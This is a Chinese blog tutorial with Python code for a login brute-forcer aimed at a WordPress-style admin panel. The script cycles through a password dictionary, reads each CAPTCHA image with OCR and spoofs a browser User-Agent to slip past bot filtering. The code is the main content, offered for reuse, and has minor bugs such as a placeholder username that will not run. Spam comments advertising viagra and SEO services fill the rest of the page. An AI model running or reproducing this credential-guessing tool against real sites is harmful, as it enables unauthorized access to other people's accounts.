Walks

网络安全爱好者

Python3学习系列(十):编写属于自己Intruder工具【下】

《Python3学习系列(十):编写属于自己Intruder工具【下】》  

前言:

继上篇文章,加个后台登陆的验证码识别流程

目录:

0x01:处理流程

0x02:准备工作

0x03:代码实现


0x01 处理流程

《Python3学习系列(十):编写属于自己Intruder工具【下】》

0x02 准备工作

安装识别验证码需要的库pillow(等于2.x的PIL,图像识别库),pytesseract(python中调用google-ocr识别的库)

pip install pillow 
pip install pytesseract

最后在安装一个:Tesseract-OCR(识别引擎)  百度下载就好

0x03 代码实现

# -*- coding: utf-8 -*-
'''
Program:WordPress后台登陆
Function:读取字典逐个登陆Wordpress后台,在知道用户名的情况下,可用来爆破登陆密码

Version:Python3.6
Time:2017/11/1
Author:Walks
个人博客:http://www.bywalks.com
'''
#导入requests库,跟2.x的urllib2和3.x的urllib.request差不多的功能,不过好像更强大
import requests
#导入图像识别的一些库
from PIL import Image
from io import BytesIO
import pytesseract
import urllib

#登陆后台
url = 'http://www.xx.cn/!logon'

#HTTP的header头,添加个user-agent,有的网站会从User-Agent来判断是否是程序访问
#如果是程序访问则不允许,添加个user-agent就是欺骗这种防护
#在这里的后台wordpress好像不用加
headers = {'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'}
#访问后,保留cookie
s = requests.Session()
#加个headers
s.headers.update(headers)

#获取图片验证码
def get_captcha_by_OCR(img):
    img = Image.open(BytesIO(response))
    #图片灰度化
    img = img.convert('L')
    img.show()
    #识别函数,图片识别
    captcha = pytesseract.image_to_string(img)
    img.close()
    print(captcha)
    return captcha

#防止报错代码
try:
    #打开pwd.txt
    with open('pwd.txt','r') as f:
        #逐行访问并且尝试
        for pwd in f:
            #去除每行的\n,当你读取一行时,如果用二进制显示,会发现每行都有个\n
            pwd = pwd.replace('\n','')
            #print(pwd)
            response = urllib.request.urlopen('http://www.xx.cn/!code').read()
            
            #构造post数据
            data = {
                    'USERNAME':User(自己的用户名),
                    'PASSWORD':pwd,
                    'AUTHCODE':get_captcha_by_OCR(response),
                    }
            #尝试登陆
            req = s.post(url,data = data)
            print(req.status_code)
            #通过某些特征判断是否登陆成功
            if 'SZ-09951217-Y' in req.text:
                print('OK')
                break
#如果出错,输出具体错误
except requests.RequestException as e:
    print(e)

该程序有个缺陷,就是只能进行简单的验证码识别流程,如果想识别其他的验证码,可以自己学习一下这方面的知识。

转载请注明来自:www.bywalks.com

点赞
  1. MetroClick specializes in building completely interactive products like Photo Booth for rental or sale, Touch Screen Kiosks, Large Touch Screen Displays , Monitors, Digital Signages and experiences. With our own hardware production facility and in-house software development teams, we are able to achieve the highest level of customization and versatility for Photo Booths, Touch Screen Kiosks, Touch Screen Monitors and Digital Signage. Visit MetroClick in NYC at http://www.metroclick.com/ or , 121 Varick St, New York, NY 10013, +1 646-843-0888

  2. Gday there, just turned out to be mindful of your website through The Big G, and have found that it's pretty entertaining. I will like should you decide maintain this approach.

  3. NYC Sapid Agency说道:

    Sapid Agency is a Search Engine Optimization company in New York City that provides SEO Services. Their proprietary SEO strategies help struggling websites and aspiring business owners to rank their websites higher in multiple search engines like Google , Yahoo and Bing. They provide local and gmb map ranking for businesses in NYC and many other local areas. Find more at https://www.sapidagency.com/ @ 145 E 57TH NEW YORK, NY 10022, USA, +1 971 341 5608 USA

  4. Bula Dailing说道:

    An interesting discussion is definitely worth comment. I believe that you need to write more on this topic, it may not be a taboo subject but usually folks don't talk about these subjects. To the next! Best wishes!

  5. Jacques Streams说道:

    It really is appropriate occasion to construct some goals for the long-term. I have digested this post and if I may, I desire to encourage you some important pointers.

  6. Hey here, just became aware of your blog site through Yahoo and bing, and have found that it is quite entertaining. I’ll value if you decide to retain this informative article.

  7. viagra说道:

    This is a topic that is near to my heart... Many thanks! Exactly where can I find the contact details for questions?

  8. Faytech North America is a touch screen Manufacturer of both monitors and pcs. They specialize in the design, development, manufacturing and marketing of Capacitive touch screen, Resistive touch screen, Industrial touch screen, IP65 touch screen, touchscreen monitors and integrated touchscreen PCs. Contact them at http://www.faytech.us, 121 Varick Street, New York, NY 10013, +1 646 205 3214

  9. Johana Detlefs说道:

    It is convenient time to make some schemes for the near future. I have read through this blog posting and if I can possibly, I wish to encourage you handful of appealing advice.

  10. I simply want to mention I am just very new to blogging and site-building and truly enjoyed this website. Most likely I’m likely to bookmark your site . You certainly have really good writings. Thank you for sharing your web page.

  11. viagra说道:

    Spot on with this write-up, I actually believe this site needs much more attention. I’ll probably be back again to read through more, thanks for the advice.

  12. viagra说道:

    An interesting discussion is worth comment. I believe that you need to publish more about this subject matter, it might not be a taboo matter but generally folks don't discuss these issues. To the next! Cheers.

  13. It really is most suitable day to create some goals for the long-run. I've go through this write-up and if I may possibly, I want to propose you number of intriguing pointers.

  14. Really compelling points you'll have mentioned, say thanks a lot for setting up.

  15. Metroclick说道:

    It is actually almost extremely difficult to see well-qualified readers on this niche, even though you appear like you are familiar with what you're posting on! Regards

  16. Oh my goodness! Amazing article dude! Many thanks, However I am encountering problems with your RSS. I don’t understand the reason why I am unable to join it. Is there anyone else getting similar RSS problems? Anyone who knows the solution can you kindly respond? Thanx!

  17. Cherie Goertz说道:

    Heya here, just turned out to be familiar with your blog through yahoo, and found that it's really informational. I’ll be grateful for in the event you persist this informative article.

  18. Garret Eric说道:

    It's the right opportunity to have some preparations for the foreseeable future. I've read this write-up and if I have the ability to, I wish to encourage you few significant instruction.

  19. Best Massage Gun说道:

    Saved as a favorite, I love your site!

  20. Shanta Morris说道:

    It is ideal opportunity to put together some schedules for the long-term. I have scan this article and if I may possibly, I want to propose you some useful tips.

发表评论

电子邮件地址不会被公开。 必填项已用*标注

6 + 4 =